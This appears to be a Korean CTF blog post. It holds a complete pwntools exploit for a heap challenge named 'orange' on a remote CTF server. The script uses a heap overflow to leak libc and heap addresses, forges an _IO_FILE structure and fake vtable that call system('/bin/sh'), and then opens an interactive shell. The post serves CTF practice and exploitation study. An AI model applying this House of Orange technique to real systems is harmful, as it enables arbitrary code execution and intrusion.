728x90
from pwn import *

#s = process("./orange")
s = remote("kshgroup.kr",1216)
elf = ELF('./orange')
libc = ELF("./libc")

def read(size,content):
    s.recvuntil(">> ")
    s.sendline('1')
    s.recvuntil("Size: ")
    s.sendline(str(size))
    s.recvuntil(">> ")
    s.sendline(content)

def re_read(index,content):
    s.recvuntil(">> ")
    s.sendline('2')
    s.recvuntil("Index: ")
    s.sendline(str(index))
    s.recvuntil(">> ")
    s.sendline(content)


def write(index):
    s.recvuntil(">> ")
    s.sendline("3")
    s.recvuntil("Index: ")
    s.sendline(str(index))


#gdb.attach(s)

read(24,"A"*24)
re_read(0,"B"*24+p64(0xfe1))
read(4096,"C"*8)
read(1024,"D"*8)


write(2)
s.recvuntil("D"*8)
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c510a
print "libc_base : " + hex(libc_base)
s.recv(2)
heap = u64(s.recv(6)+"\x00\x00")
heap = heap - 0x20
print "heap : " + hex(heap)
system = libc_base + libc.symbols['system']
main_arena = leak - 1514
print "system : " + hex(system)
print "main-arena : " + hex(main_arena)
io_list_all = libc_base + 0x3c5520
print "io_list_all : " + hex(io_list_all)


io_file = "/bin/sh\x00"
io_file += p64(0x61)
io_file += p64(0)
io_file += p64(io_list_all - 0x10)
io_file += p64(0)
io_file += p64(1)
io_file = io_file.ljust(0xc0,"\x00")
io_file += p64(0)


io_file = io_file.ljust(0xd8,"\x00")
io_file += p64(heap+0x510) #fake

io_jump = "\x00"*0x18
io_jump += p64(system)

pay = "A"*0x400
pay += io_file
pay += io_jump


re_read(2,pay)


s.interactive()


'PWN > CTF' 카테고리의 다른 글

[Hackingcamp 19] ucanfind  (0) 2019.02.20
[Hackingcamp 19] guess  (0) 2019.02.20
[Hackingcamp 19] sms_service  (0) 2019.02.20
[Asis 2015] math sequence  (0) 2019.02.15
[Asis 2016] b00ks  (0) 2019.02.06